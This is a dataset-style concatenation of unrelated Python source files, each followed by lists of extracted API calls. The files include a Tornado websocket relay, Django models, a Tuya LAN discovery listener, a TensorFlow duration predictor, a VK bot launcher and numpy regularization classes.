time\n'), ((1550, 1561), 'time.time', 'time.time', ([], {}), '()\n', (1559, 1561), False, 'import time\n'), ((1995, 2006), 'time.time', 'time.time', ([], {}), '()\n', (2004, 2006), False, 'import time\n'), ((2393, 2404), 'time.time', 'time.time', ([], {}), '()\n', (2402, 2404), False, 'import time\n'), ((2493, 2555), 'face_alignment.predict_pose', 'fa.predict_pose', (['new_img', 'new_bboxes[count_crops]'], {'dense': '(False)'}), '(new_img, new_bboxes[count_crops], dense=False)\n', (2508, 2555), True, 'import face_alignment as fa\n'), ((2938, 2949), 'time.time', 'time.time', ([], {}), '()\n', (2947, 2949), False, 'import time\n'), ((2986, 3057), 'face_fit.fit_3dmm', 'ff.fit_3dmm', (['rotation', 't3d', '(scale * factor)'], {'width': 'crop_w', 'height': 'crop_h'}), '(rotation, t3d, scale * factor, width=crop_w, height=crop_h)\n', (2997, 3057), True, 'import face_fit as ff\n'), ((3589, 3600), 'time.time', 'time.time', ([], {}), '()\n', (3598, 3600), False, 'import time\n'), ((3640, 3688), 'utils.landmarks_to_np_array', 'utils.landmarks_to_np_array', (['fit_kpts', 'landmarks'], {}), '(fit_kpts, landmarks)\n', (3667, 3688), False, 'import utils\n'), ((3859, 3870), 'time.time', 'time.time', ([], {}), '()\n', (3868, 3870), False, 'import time\n'), ((3906, 3958), 'cv2.findHomography', 'cv2.findHomography', (['fore_lmks', 'back_lmks', 'cv2.RANSAC'], {}), '(fore_lmks, back_lmks, cv2.RANSAC)\n', (3924, 3958), False, 'import cv2\n'), ((4134, 4145), 'time.time', 'time.time', ([], {}), '()\n', (4143, 4145), False, 'import time\n'), ((4173, 4221), 'cv2.warpPerspective', 'cv2.warpPerspective', (['fit_img', 'homography', '(w, h)'], {}), '(fit_img, homography, (w, h))\n', (4192, 4221), False, 'import cv2\n'), ((4511, 4522), 'time.time', 'time.time', ([], {}), '()\n', (4520, 4522), False, 'import time\n'), ((4551, 4611), 'utils.create_transparent_overlay_faster', 'utils.create_transparent_overlay_faster', (['warp_img', 'img', 'w', 'h'], {}), '(warp_img, img, w, h)\n', (4590, 4611), 
False, 'import utils\n'), ((2141, 2152), 'time.time', 'time.time', ([], {}), '()\n', (2150, 2152), False, 'import time\n'), ((2589, 2600), 'time.time', 'time.time', ([], {}), '()\n', (2598, 2600), False, 'import time\n'), ((3091, 3102), 'time.time', 'time.time', ([], {}), '()\n', (3100, 3102), False, 'import time\n'), ((3722, 3733), 'time.time', 'time.time', ([], {}), '()\n', (3731, 3733), False, 'import time\n'), ((3992, 4003), 'time.time', 'time.time', ([], {}), '()\n', (4001, 4003), False, 'import time\n'), ((4255, 4266), 'time.time', 'time.time', ([], {}), '()\n', (4264, 4266), False, 'import time\n'), ((4646, 4657), 'time.time', 'time.time', ([], {}), '()\n', (4655, 4657), False, 'import time\n')] |
from tornado import websocket, web, ioloop
import json
streamers = []
streamees = dict()
streamees_check = []
image = str()
class StreamerHandler(websocket.WebSocketHandler):
def open(self, ws_id):
self.ws_id = ws_id
global streamers
if self not in streamers:
streamers.append(self)
def on_message(self, message):
self.write_message("OK")
if self.ws_id in streamees.keys():
for streamee in streamees[self.ws_id]:
streamee.write_message(message)
def on_close(self):
global streamers
if self in streamers:
streamers.remove(self)
class StreameeHandler(websocket.WebSocketHandler):
def open(self, ws_id):
self.ws_id = ws_id
global streamees_check, streamees
if self not in streamees_check:
if not ws_id in streamees.keys():
streamees[ws_id] = list()
streamees[ws_id].append(self)
streamees_check.append(self)
def on_close(self):
global streamees, streamees_check
if self in streamees_check:
streamees_check.remove(self)
streamees[self.ws_id].remove(self)
settings = {'auto_reload': True, 'debug': True}
streamer_app = web.Application([
(r'/streamer/(.*)', StreamerHandler)
], **settings)
streamee_app = web.Application([
(r'/streamee/(.*)', StreameeHandler)
], **settings)
if __name__ == '__main__':
streamee_app.listen(8888)
streamer_app.listen(8889)
ioloop.IOLoop.instance().start()
| [
"tornado.ioloop.IOLoop.instance",
"tornado.web.Application"
] | [((1276, 1342), 'tornado.web.Application', 'web.Application', (["[('/streamer/(.*)', StreamerHandler)]"], {}), "([('/streamer/(.*)', StreamerHandler)], **settings)\n", (1291, 1342), False, 'from tornado import websocket, web, ioloop\n'), ((1366, 1432), 'tornado.web.Application', 'web.Application', (["[('/streamee/(.*)', StreameeHandler)]"], {}), "([('/streamee/(.*)', StreameeHandler)], **settings)\n", (1381, 1432), False, 'from tornado import websocket, web, ioloop\n'), ((1533, 1557), 'tornado.ioloop.IOLoop.instance', 'ioloop.IOLoop.instance', ([], {}), '()\n', (1555, 1557), False, 'from tornado import websocket, web, ioloop\n')] |
import os
from astropy.io import ascii
import initialize_mosdef_dirs as imd
import matplotlib.pyplot as plt
def plot_scaled_composites(n_clusters):
"""Using the scaling that was done above, plot the scaled composite seds
Parameters:
n_clusters (int): Number of clusters
"""
fig, ax = plt.subplots(figsize=(8, 7))
for groupID in range(n_clusters):
data_df = ascii.read(imd.composite_sed_csvs_dir + f'/{groupID}_sed.csv').to_pandas()
if len(os.listdir(imd.cluster_dir + f'/{groupID}')) < 15:
continue
ax.plot(data_df['rest_wavelength'], data_df['rest_wavelength']*data_df['f_lambda_scaled'], ls='-', marker='None')
# ax.plot([5000, 5000], [-10, 10], ls='--', color='black')
ax.set_xscale('log')
ax.set_xlim(800, 45000)
# ax.set_ylim(-1e-16, 9e-16)
ax.set_xlabel('Rest Wavelength ($\AA$)', fontsize=14)
ax.set_ylabel('Normalized Flux ($\lambda$ F$_\lambda$)', fontsize=14)
ax.tick_params(size=12)
fig.savefig(imd.composite_sed_images_dir + '/scaled_composites.pdf')
| [
"astropy.io.ascii.read",
"os.listdir",
"matplotlib.pyplot.subplots"
] | [((313, 341), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(8, 7)'}), '(figsize=(8, 7))\n', (325, 341), True, 'import matplotlib.pyplot as plt\n'), ((398, 460), 'astropy.io.ascii.read', 'ascii.read', (["(imd.composite_sed_csvs_dir + f'/{groupID}_sed.csv')"], {}), "(imd.composite_sed_csvs_dir + f'/{groupID}_sed.csv')\n", (408, 460), False, 'from astropy.io import ascii\n'), ((488, 531), 'os.listdir', 'os.listdir', (["(imd.cluster_dir + f'/{groupID}')"], {}), "(imd.cluster_dir + f'/{groupID}')\n", (498, 531), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from shop.models import Product
from accounts.models import User
class Cart(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
paid = models.BooleanField(default=False)
is_in_order = models.BooleanField(default=False)
class Meta:
ordering = ('-created',)
def __str__(self):
return 'cart {}'.format(self.user.email)
def get_total_cost(self):
return sum(item.get_cost() for item in self.items.all())
class CartItem(models.Model):
cart = models.ForeignKey(Cart, related_name='items',
null=True,
on_delete=models.CASCADE,
)
product = models.ForeignKey(Product,
related_name='cart_items',
on_delete=models.CASCADE,
)
price = models.DecimalField(max_digits=10, decimal_places=2, default=0)
quantity = models.PositiveIntegerField(default=1)
def __str__(self):
return '{}'.format(self.product.name)
def get_cost(self):
return self.price * self.quantity
| [
"django.db.models.OneToOneField",
"django.db.models.ForeignKey",
"django.db.models.BooleanField",
"django.db.models.PositiveIntegerField",
"django.db.models.DateTimeField",
"django.db.models.DecimalField"
] | [((198, 261), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE', 'null': '(True)'}), '(User, on_delete=models.CASCADE, null=True)\n', (218, 261), False, 'from django.db import models\n'), ((276, 315), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (296, 315), False, 'from django.db import models\n'), ((330, 365), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (350, 365), False, 'from django.db import models\n'), ((377, 411), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (396, 411), False, 'from django.db import models\n'), ((430, 464), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (449, 464), False, 'from django.db import models\n'), ((727, 814), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Cart'], {'related_name': '"""items"""', 'null': '(True)', 'on_delete': 'models.CASCADE'}), "(Cart, related_name='items', null=True, on_delete=models.\n CASCADE)\n", (744, 814), False, 'from django.db import models\n'), ((838, 917), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Product'], {'related_name': '"""cart_items"""', 'on_delete': 'models.CASCADE'}), "(Product, related_name='cart_items', on_delete=models.CASCADE)\n", (855, 917), False, 'from django.db import models\n'), ((944, 1007), 'django.db.models.DecimalField', 'models.DecimalField', ([], {'max_digits': '(10)', 'decimal_places': '(2)', 'default': '(0)'}), '(max_digits=10, decimal_places=2, default=0)\n', (963, 1007), False, 'from django.db import models\n'), ((1023, 1061), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(1)'}), '(default=1)\n', (1050, 1061), False, 'from django.db import models\n')] |
#!/usr/bin/env python3
# encoding: utf-8
"""
tuya-discovery.py
Created by kueblc on 2019-11-13.
Discover Tuya devices on the LAN via UDP broadcast
"""
import asyncio
import json
from Crypto.Cipher import AES
pad = lambda s: s + (16 - len(s) % 16) * chr(16 - len(s) % 16)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
encrypt = lambda msg, key: AES.new(key, AES.MODE_ECB).encrypt(pad(msg))
decrypt = lambda msg, key: unpad(AES.new(key, AES.MODE_ECB).decrypt(msg))
from hashlib import md5
udpkey = md5(b"yGAdlopoPVldABfn").digest()
decrypt_udp = lambda msg: decrypt(msg, udpkey)
class TuyaDiscovery(asyncio.DatagramProtocol):
def datagram_received(self, data, addr):
# remove message frame
data = data[20:-8]
# decrypt if encrypted
try:
data = decrypt_udp(data)
except:
pass
# parse json
try:
data = json.loads(data)
except:
pass
print(addr[0], data)
def main():
loop = asyncio.get_event_loop()
listener = loop.create_datagram_endpoint(TuyaDiscovery, local_addr=('0.0.0.0', 6666))
encrypted_listener = loop.create_datagram_endpoint(TuyaDiscovery, local_addr=('0.0.0.0', 6667))
loop.run_until_complete(listener)
print("Listening for Tuya broadcast on UDP 6666")
loop.run_until_complete(encrypted_listener)
print("Listening for encrypted Tuya broadcast on UDP 6667")
try:
loop.run_forever()
except KeyboardInterrupt:
loop.stop()
if __name__ == "__main__":
main()
| [
"json.loads",
"asyncio.get_event_loop",
"Crypto.Cipher.AES.new",
"hashlib.md5"
] | [((902, 926), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (924, 926), False, 'import asyncio\n'), ((496, 520), 'hashlib.md5', 'md5', (["b'yGAdlopoPVldABfn'"], {}), "(b'yGAdlopoPVldABfn')\n", (499, 520), False, 'from hashlib import md5\n'), ((343, 369), 'Crypto.Cipher.AES.new', 'AES.new', (['key', 'AES.MODE_ECB'], {}), '(key, AES.MODE_ECB)\n', (350, 369), False, 'from Crypto.Cipher import AES\n'), ((823, 839), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (833, 839), False, 'import json\n'), ((421, 447), 'Crypto.Cipher.AES.new', 'AES.new', (['key', 'AES.MODE_ECB'], {}), '(key, AES.MODE_ECB)\n', (428, 447), False, 'from Crypto.Cipher import AES\n')] |
import tensorflow as tf
import numpy as np
from interfaces import AbstractSelfAdaptingStrategy
def _get_category_encoding_layer(size):
return lambda feature: tf.one_hot(feature, size + 1) # +1 since classes are labeled from 1
def _prepare_inputs():
all_inputs = tf.keras.Input(shape=(2,), dtype='int32')
encoded_features = []
domain_sizes = [1875, 20]
for idx in range(0, 2):
encoding_layer = _get_category_encoding_layer(domain_sizes[idx])
encoded_col = encoding_layer(all_inputs[:, idx])
encoded_features.append(encoded_col)
return all_inputs, encoded_features
def _create_model(layers_widths):
all_inputs, encoded_features = _prepare_inputs()
last_layer = tf.keras.layers.Concatenate()(encoded_features)
for width in layers_widths:
last_layer = tf.keras.layers.Dense(int(width), activation=tf.keras.activations.relu)(last_layer)
output = tf.keras.layers.Dense(1, tf.keras.activations.exponential)(last_layer)
model = tf.keras.Model(inputs=all_inputs, outputs=output)
learning_rate = tf.keras.experimental.CosineDecay(0.01, 10000000)
model.compile(optimizer=tf.optimizers.Adam(learning_rate=learning_rate), loss=tf.losses.Poisson())
# model.summary()
return model
def _jobs_to_tensors(jobs):
x = list(map(lambda job: [job.exercise_id, job.runtime_id], jobs))
y = list(map(lambda job: [job.duration], jobs))
return tf.convert_to_tensor(x, dtype=tf.int32), tf.convert_to_tensor(y, dtype=tf.float32)
class CategorySelfAdaptingStrategy(AbstractSelfAdaptingStrategy):
"""Uses machine-learning neural-network regression model to predict the job duration.
The model is trained in SA and used by dispatcher (via estimation function interface).
The model is implemented in TensorFlow.
"""
def __init__(self, layers_widths=[64], batch_size=5000, batch_epochs=5, ref_jobs=None):
tf.config.threading.set_inter_op_parallelism_threads(8)
tf.config.threading.set_intra_op_parallelism_threads(8)
# tf.config.set_visible_devices([], 'GPU')
self.layers_widths = layers_widths
self.batch_size = batch_size
self.batch_epochs = batch_epochs
self.ref_jobs = ref_jobs[:] if ref_jobs else None
self.buffer = []
self.model = None
def _advance_ts(self, ts):
while len(self.ref_jobs) > 0 and self.ref_jobs[-1].spawn_ts + self.ref_jobs[-1].duration <= ts:
job = self.ref_jobs.pop()
if job.compilation_ok:
self.buffer.append(job)
def _train_batch(self):
"""Take the job buffer and use it as batch for training."""
if len(self.buffer) > self.batch_size:
x, y = _jobs_to_tensors(self.buffer)
self.model.fit(x, y, batch_size=len(self.buffer), epochs=self.batch_epochs, verbose=False)
self.buffer = [] # reset the job buffer at the end
def init(self, ts, dispatcher, workers):
self.model = _create_model(self.layers_widths)
self._advance_ts(ts)
self._train_batch()
@tf.function
def predict_single(input):
return self.model(input, training=False)[0]
def predictor(job):
x = np.array([[job.exercise_id, job.runtime_id]], dtype='int32')
return predict_single(x).numpy()[0]
dispatcher.set_predictor(predictor)
def do_adapt(self, ts, dispatcher, workers, job=None):
self._advance_ts(ts)
if job and job.compilation_ok:
self.buffer.append(job)
self._train_batch()
| [
"tensorflow.one_hot",
"tensorflow.losses.Poisson",
"tensorflow.config.threading.set_intra_op_parallelism_threads",
"tensorflow.keras.layers.Concatenate",
"tensorflow.convert_to_tensor",
"numpy.array",
"tensorflow.keras.experimental.CosineDecay",
"tensorflow.keras.layers.Dense",
"tensorflow.config.th... | [((275, 316), 'tensorflow.keras.Input', 'tf.keras.Input', ([], {'shape': '(2,)', 'dtype': '"""int32"""'}), "(shape=(2,), dtype='int32')\n", (289, 316), True, 'import tensorflow as tf\n'), ((1006, 1055), 'tensorflow.keras.Model', 'tf.keras.Model', ([], {'inputs': 'all_inputs', 'outputs': 'output'}), '(inputs=all_inputs, outputs=output)\n', (1020, 1055), True, 'import tensorflow as tf\n'), ((1076, 1125), 'tensorflow.keras.experimental.CosineDecay', 'tf.keras.experimental.CosineDecay', (['(0.01)', '(10000000)'], {}), '(0.01, 10000000)\n', (1109, 1125), True, 'import tensorflow as tf\n'), ((164, 193), 'tensorflow.one_hot', 'tf.one_hot', (['feature', '(size + 1)'], {}), '(feature, size + 1)\n', (174, 193), True, 'import tensorflow as tf\n'), ((724, 753), 'tensorflow.keras.layers.Concatenate', 'tf.keras.layers.Concatenate', ([], {}), '()\n', (751, 753), True, 'import tensorflow as tf\n'), ((922, 980), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)', 'tf.keras.activations.exponential'], {}), '(1, tf.keras.activations.exponential)\n', (943, 980), True, 'import tensorflow as tf\n'), ((1432, 1471), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['x'], {'dtype': 'tf.int32'}), '(x, dtype=tf.int32)\n', (1452, 1471), True, 'import tensorflow as tf\n'), ((1473, 1514), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['y'], {'dtype': 'tf.float32'}), '(y, dtype=tf.float32)\n', (1493, 1514), True, 'import tensorflow as tf\n'), ((1918, 1973), 'tensorflow.config.threading.set_inter_op_parallelism_threads', 'tf.config.threading.set_inter_op_parallelism_threads', (['(8)'], {}), '(8)\n', (1970, 1973), True, 'import tensorflow as tf\n'), ((1982, 2037), 'tensorflow.config.threading.set_intra_op_parallelism_threads', 'tf.config.threading.set_intra_op_parallelism_threads', (['(8)'], {}), '(8)\n', (2034, 2037), True, 'import tensorflow as tf\n'), ((1154, 1201), 'tensorflow.optimizers.Adam', 'tf.optimizers.Adam', ([], 
{'learning_rate': 'learning_rate'}), '(learning_rate=learning_rate)\n', (1172, 1201), True, 'import tensorflow as tf\n'), ((1208, 1227), 'tensorflow.losses.Poisson', 'tf.losses.Poisson', ([], {}), '()\n', (1225, 1227), True, 'import tensorflow as tf\n'), ((3245, 3305), 'numpy.array', 'np.array', (['[[job.exercise_id, job.runtime_id]]'], {'dtype': '"""int32"""'}), "([[job.exercise_id, job.runtime_id]], dtype='int32')\n", (3253, 3305), True, 'import numpy as np\n')] |
# Generated by Django 2.2.7 on 2020-01-04 23:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('MainProject', '0023_auto_20200105_0203'),
]
operations = [
migrations.AddField(
model_name='coursematerial',
name='doc_file',
field=models.FileField(null=True, upload_to='documents/'),
),
migrations.DeleteModel(
name='CourseMaterialFile',
),
]
| [
"django.db.migrations.DeleteModel",
"django.db.models.FileField"
] | [((420, 469), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""CourseMaterialFile"""'}), "(name='CourseMaterialFile')\n", (442, 469), False, 'from django.db import migrations, models\n'), ((348, 399), 'django.db.models.FileField', 'models.FileField', ([], {'null': '(True)', 'upload_to': '"""documents/"""'}), "(null=True, upload_to='documents/')\n", (364, 399), False, 'from django.db import migrations, models\n')] |
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
from __future__ import division, print_function
from Bio import SeqIO
import sys
getName = lambda x : x if "_" not in x else x[:x.rfind("_")]
data = {}
with open(sys.argv[1], "r") as inF:
for record in SeqIO.parse(inF, "fasta"):
fullName = record.name
seq = str(record.seq)
l = data.get(seq, [])
l.append(fullName)
data[seq] = l
# now filter out all singletons
with open(sys.argv[2], "w") as outF:
for seq in data:
names = data[seq]
indNames = set()
for name in names:
indNames.add(getName(name))
if len(indNames) >= 2:
for name in names:
outF.write(">%s\n%s\n" % (name, seq))
| [
"Bio.SeqIO.parse"
] | [((256, 281), 'Bio.SeqIO.parse', 'SeqIO.parse', (['inF', '"""fasta"""'], {}), "(inF, 'fasta')\n", (267, 281), False, 'from Bio import SeqIO\n')] |
import codecs
import importlib
import logging
import os
import sys
import time
import html
import accounts
import config
import log
import storage
from args import args
from vkapi import VkApi
from vkbot import createVkApi
from scripts import runScript, runInMaster
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
accounts.init()
class MyHandler(logging.Handler):
def emit(self, record):
pass
def handle(self, record):
msg = record.getMessage()
lvl = record.levelname
if any(msg.lower().startswith(i) for i in ('red|', 'green|', 'yellow|')):
color, msg = msg.split('|', maxsplit=1)
log.info((msg, html.escape(msg)), color.lower())
return
db_msg = getattr(record, 'db', None)
if db_msg:
msg = (msg, db_msg)
if lvl == 'CRITICAL':
log.error(msg, fatal=True)
elif lvl == 'ERROR':
log.error(msg, record.exc_info is not None)
elif lvl == 'WARNING':
log.warning(msg)
elif lvl == 'INFO':
log.info(msg)
elif lvl == 'DEBUG':
log.debug(msg)
logging.basicConfig(handlers=[MyHandler()], level=logging.DEBUG)
logging.getLogger('antigate').setLevel(logging.CRITICAL)
logging.getLogger('requests').setLevel(logging.CRITICAL)
logging.getLogger('asyncio').setLevel(logging.CRITICAL)
if config.get('vkbot.suppress_chat_stderr', 'b'):
logging.getLogger('chatlog').setLevel(logging.CRITICAL)
os.environ['LC_ALL'] = 'ru_RU.utf-8'
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
sys.stdout.encoding = 'UTF-8'
login = config.get('login.login')
password = config.get('login.password')
storage.init(accounts.getFile('storage.db'))
def availableScripts():
print('Available scripts:', ', '.join(sorted(i[:-3] for i in os.listdir('scripts') if i.endswith('.py') and not i.startswith('__'))))
if args['script'] is None:
availableScripts()
sys.exit()
if args['script']:
if not args['script'].replace('_', '').isalpha():
print('Invalid script')
availableScripts()
sys.exit()
if args['master']:
if runInMaster(args['script'].lower(), args['args']):
sys.exit()
logging.warning('Failed to run script in master')
v = createVkApi(login, password)
try:
runScript(args['script'].lower(), args['args'], v)
except ImportError:
print('Invalid script')
availableScripts()
sys.exit(1)
sys.exit()
logging.info('Starting vkbot, pid ' + str(os.getpid()))
| [
"logging.getLogger",
"log.warning",
"os.listdir",
"config.get",
"log.error",
"codecs.getwriter",
"accounts.init",
"log.info",
"logging.warning",
"sys.stdout.detach",
"os.path.realpath",
"log.debug",
"vkbot.createVkApi",
"os.getpid",
"sys.exit",
"html.escape",
"accounts.getFile"
] | [((326, 341), 'accounts.init', 'accounts.init', ([], {}), '()\n', (339, 341), False, 'import accounts\n'), ((1387, 1432), 'config.get', 'config.get', (['"""vkbot.suppress_chat_stderr"""', '"""b"""'], {}), "('vkbot.suppress_chat_stderr', 'b')\n", (1397, 1432), False, 'import config\n'), ((1630, 1655), 'config.get', 'config.get', (['"""login.login"""'], {}), "('login.login')\n", (1640, 1655), False, 'import config\n'), ((1667, 1695), 'config.get', 'config.get', (['"""login.password"""'], {}), "('login.password')\n", (1677, 1695), False, 'import config\n'), ((1545, 1570), 'codecs.getwriter', 'codecs.getwriter', (['"""utf-8"""'], {}), "('utf-8')\n", (1561, 1570), False, 'import codecs\n'), ((1571, 1590), 'sys.stdout.detach', 'sys.stdout.detach', ([], {}), '()\n', (1588, 1590), False, 'import sys\n'), ((1710, 1740), 'accounts.getFile', 'accounts.getFile', (['"""storage.db"""'], {}), "('storage.db')\n", (1726, 1740), False, 'import accounts\n'), ((1960, 1970), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1968, 1970), False, 'import sys\n'), ((2297, 2325), 'vkbot.createVkApi', 'createVkApi', (['login', 'password'], {}), '(login, password)\n', (2308, 2325), False, 'from vkbot import createVkApi\n'), ((2501, 2511), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2509, 2511), False, 'import sys\n'), ((294, 323), 'os.path.realpath', 'os.path.realpath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (310, 323), False, 'import os\n'), ((1214, 1243), 'logging.getLogger', 'logging.getLogger', (['"""antigate"""'], {}), "('antigate')\n", (1231, 1243), False, 'import logging\n'), ((1271, 1300), 'logging.getLogger', 'logging.getLogger', (['"""requests"""'], {}), "('requests')\n", (1288, 1300), False, 'import logging\n'), ((1328, 1356), 'logging.getLogger', 'logging.getLogger', (['"""asyncio"""'], {}), "('asyncio')\n", (1345, 1356), False, 'import logging\n'), ((2112, 2122), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2120, 2122), False, 'import sys\n'), ((2239, 2288), 'logging.warning', 
'logging.warning', (['"""Failed to run script in master"""'], {}), "('Failed to run script in master')\n", (2254, 2288), False, 'import logging\n'), ((866, 892), 'log.error', 'log.error', (['msg'], {'fatal': '(True)'}), '(msg, fatal=True)\n', (875, 892), False, 'import log\n'), ((1438, 1466), 'logging.getLogger', 'logging.getLogger', (['"""chatlog"""'], {}), "('chatlog')\n", (1455, 1466), False, 'import logging\n'), ((2220, 2230), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2228, 2230), False, 'import sys\n'), ((2485, 2496), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2493, 2496), False, 'import sys\n'), ((2556, 2567), 'os.getpid', 'os.getpid', ([], {}), '()\n', (2565, 2567), False, 'import os\n'), ((934, 977), 'log.error', 'log.error', (['msg', '(record.exc_info is not None)'], {}), '(msg, record.exc_info is not None)\n', (943, 977), False, 'import log\n'), ((675, 691), 'html.escape', 'html.escape', (['msg'], {}), '(msg)\n', (686, 691), False, 'import html\n'), ((1021, 1037), 'log.warning', 'log.warning', (['msg'], {}), '(msg)\n', (1032, 1037), False, 'import log\n'), ((1078, 1091), 'log.info', 'log.info', (['msg'], {}), '(msg)\n', (1086, 1091), False, 'import log\n'), ((1832, 1853), 'os.listdir', 'os.listdir', (['"""scripts"""'], {}), "('scripts')\n", (1842, 1853), False, 'import os\n'), ((1133, 1147), 'log.debug', 'log.debug', (['msg'], {}), '(msg)\n', (1142, 1147), False, 'import log\n')] |
from django.db import transaction
from api.management.data_script import OperationalDataScript
from api.models.signing_authority_assertion import SigningAuthorityAssertion
class UpdateSigningAuthorityAssertions(OperationalDataScript):
    """Refresh the signing-authority assertion text for consumer ZEV sales."""

    is_revertable = False
    comment = 'Update the assertions for the compliance report'

    def check_run_preconditions(self):
        # This script has no preconditions; it is always safe to run.
        return True

    def update_assertions(self):
        # Fetch the consumer-sales assertion and overwrite its description.
        assertion = SigningAuthorityAssertion.objects.get(module="consumer_sales")
        assertion.description = (
            "I confirm this consumer ZEV sales information is complete and correct."
        )
        assertion.save()

    @transaction.atomic
    def run(self):
        self.update_assertions()


script_class = UpdateSigningAuthorityAssertions
| [
"api.models.signing_authority_assertion.SigningAuthorityAssertion.objects.get"
] | [((598, 660), 'api.models.signing_authority_assertion.SigningAuthorityAssertion.objects.get', 'SigningAuthorityAssertion.objects.get', ([], {'module': '"""consumer_sales"""'}), "(module='consumer_sales')\n", (635, 660), False, 'from api.models.signing_authority_assertion import SigningAuthorityAssertion\n')] |
# -*- coding: utf-8 -*-
import numpy as np
# Note: careful as np.multiply does an elementwise multiply on numpy arrays
# asterisk (*) does the same but will perfom matrix multiplication on mat (numpy matrices)
class L1Regularization:
    """
    **Lasso Regression (L1Regularization)**

    Adds the sum of the absolute values of the parameters as a penalty
    term to the loss function.

    References:
        [1] Regularization (mathematics)
            * [Wikipedia Article] https://en.wikipedia.org/wiki/Regularization_(mathematics)
        [2] Regression shrinkage and selection via the lasso
            * [R Tibshirani, 1996] https://goo.gl/Yh9bBU

    Args:
        _lambda (float32): controls the weight of the penalty term
    """
    def __init__(self, _lambda, **kwargs):
        # **kwargs absorbs factory-supplied arguments (e.g. l1_ratio)
        # that do not apply to a pure L1 penalty.
        self._lambda = _lambda

    def regulate(self, weights):
        """Return the L1 penalty: lambda * sum(|w|).

        BUG fix: the previous implementation used np.linalg.norm(weights),
        which computes the Euclidean (L2) norm for a vector. The L1 penalty
        is the sum of absolute values — consistent with `derivative`, which
        returns lambda * sign(w).
        """
        return np.multiply(self._lambda, np.sum(np.abs(weights)))

    def derivative(self, weights):
        """Sub-gradient of the L1 penalty: lambda * sign(w)."""
        return np.multiply(self._lambda, np.sign(weights))

    @property
    def regulation_name(self):
        return self.__class__.__name__
class L2Regularization:
    """Ridge (L2) penalty.

    Adds half the squared L2 norm of the weights, scaled by ``_lambda``,
    as a penalty term to the loss function.

    References:
        [1] Regularization (mathematics)
            * [Wikipedia Article] https://en.wikipedia.org/wiki/Regularization_(mathematics)

    Args:
        _lambda (float32): controls the weight of the penalty term
    """
    def __init__(self, _lambda, **kwargs):
        # **kwargs absorbs unused factory arguments such as l1_ratio.
        self._lambda = _lambda

    def regulate(self, weights):
        # 0.5 * lambda * (w . w)
        squared_norm = weights.T.dot(weights)
        return np.multiply(self._lambda, 0.5 * squared_norm)

    def derivative(self, weights):
        # d/dw [0.5 * lambda * w.w] = lambda * w
        return np.multiply(self._lambda, weights)

    @property
    def regulation_name(self):
        return self.__class__.__name__
class ElasticNetRegularization:
    """Elastic-net penalty: a mix of a squared-magnitude and a norm term.

    References:
        [1] Regularization (mathematics)
            * [Wikipedia Article] https://en.wikipedia.org/wiki/Regularization_(mathematics)

    Args:
        _lambda (float32): controls the weight of the penalty term
        l1_ratio (float32): mixing coefficient between the two terms
    """
    def __init__(self, _lambda, l1_ratio):
        self._lambda = _lambda
        self.l1_ratio = l1_ratio

    def regulate(self, weights):
        squared_term = (self.l1_ratio * 0.5) * weights.T.dot(weights)
        norm_term = (1 - self.l1_ratio) * np.linalg.norm(weights)
        return np.multiply(self._lambda, squared_term + norm_term)

    def derivative(self, weights):
        grad = (self.l1_ratio * 0.5) * weights + (1 - self.l1_ratio) * np.sign(weights)
        return np.multiply(self._lambda, grad)

    @property
    def regulation_name(self):
        return self.__class__.__name__
class RegularizationFunction:
    """Factory facade: builds a regularizer by name and delegates to it.

    Args:
        name: one of 'l1', 'lasso', 'l2', 'ridge', 'elastic', 'elastic_net'.
        _lambda: weight of the penalty term.
        l1_ratio: L1 mixing ratio (consumed by the elastic-net variants;
            absorbed via **kwargs by the others).

    Raises:
        Exception: if ``name`` is not a known regularizer.
    """
    _regularizers = {
        'l1'          : L1Regularization,
        'lasso'       : L1Regularization,
        'l2'          : L2Regularization,
        'ridge'       : L2Regularization,
        'elastic'     : ElasticNetRegularization,
        'elastic_net' : ElasticNetRegularization
    }

    def __init__(self, name='lasso', _lambda=0.5, l1_ratio=0.5):
        if name not in self._regularizers.keys():
            raise Exception('Regularization function must be either one of the following: {}.'.format(', '.join(self._regularizers.keys())))
        self.regularization_func = self._regularizers[name](_lambda, l1_ratio=l1_ratio)

    @property
    def name(self):
        # BUG fix: the regularizer classes expose a `regulation_name`
        # property; `regularization_name` does not exist and this property
        # raised AttributeError whenever it was read.
        return self.regularization_func.regulation_name

    def regulate(self, weights):
        return self.regularization_func.regulate(weights)

    def derivative(self, weights):
        return self.regularization_func.derivative(weights)
| [
"numpy.multiply",
"numpy.sign",
"numpy.linalg.norm"
